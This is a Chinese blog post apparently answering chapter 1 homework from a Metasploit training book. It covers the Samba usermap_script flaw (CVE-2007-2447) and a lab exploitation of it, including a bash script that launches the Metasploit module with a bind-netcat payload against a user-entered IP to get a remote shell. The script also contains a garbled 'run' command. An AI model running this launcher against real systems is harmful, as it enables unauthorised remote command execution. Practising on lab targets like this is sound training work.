• 《Metasploit魔鬼训练营》第一章实践作业


    《Metasploit魔鬼训练营》第一章实践作业

    1.搜集Samba服务usermap_script安全漏洞的相关信息,画出该安全漏洞的生命周期图,标注各个重要事件点的日期,并提供详细描述和链接。

    参考链接:

    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447

    http://samba.org/samba/security/CVE-2007-2447.html

    https://www.samba.org/samba/history/security.html

    https://github.com/rapid7/metasploit-framework/commits/master//modules/exploits/multi/samba/usermap_script.rb

     

     

    描述:Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行,影响Samba的3.0.20到3.0.25rc3 版本,当使用非默认的用户名映射脚本配置选项时产生,通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令。

    时间线:2007年5月7日漏洞被披露到security@samba.org这个邮箱中,2007年5月14日samba公开漏洞信息并提供了该漏洞的补丁。

     

    2010年2月16日Metasploit首次为该漏洞提供攻击模块载荷。

    2.利用Linux Shell命令统计出分别针对Windows 2000、Windows XP、Windows Server 2003、Windows Vista、Windows 7和Windows Server 2008目标环境的渗透攻击模块数量。

    命令:search type:exploit target:Windows 2000

    Windows 2000:170个

     

    Windows XP:834个

     

    Windows Server 2003:319个

     

    Windows Vista:111个

     

    Windows 7:705个

     

    Windows Server 2008:278个

     

    3.完成一次针对Linux靶机usermap_script漏洞的渗透攻击,尝试植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。

     

    用show payload查看针对该漏洞的攻击载荷,然后用set payload命令设置攻击载荷;

     

    show options命令可以查看配置,并用set命令完成相关的配置;

     

    用exploit命令启动渗透攻击,成功getshell。

    4.使用msfcli命令行接口编写一个Shell脚本程序,实现用户只需输入目标Linux靶机的IP地址作为参数,就可以使用usermap_script漏洞渗透攻击模块,获得靶机的远程Shell访问。

    用vim编辑脚本test.sh

    #!/bin/bash                   #表示用bash执行
    echo "please set RHOST IP"
    read -p "IP:" IP              #让用户输入目标IP
    msfconsole -x "use multi/samba/usermap_script;set payload cmd/unix/bind_netcat;set RHOST $IP;
    un"    #由于最新版本的Metasploit取消了msfcli,所以现在使用msfconsole -x来执行

     编辑好test.sh后,用命令 ./test.sh来执行脚本(TIPS:如果是用vim直接创建的新文件,文件是没有可执行权限的,需要用chomd命令添加可执行权限。)

     

     成功getshell。

  • 相关阅读:
    javascript 冒泡
    js闭包
    loadmore & scroll
    viewport
    担当
    javascript pattern
    javascript function
    interview
    json and .net
    java sqlserver
  • 原文地址:https://www.cnblogs.com/Dio-Hch/p/12545787.html
Copyright © 2020-2023  润新知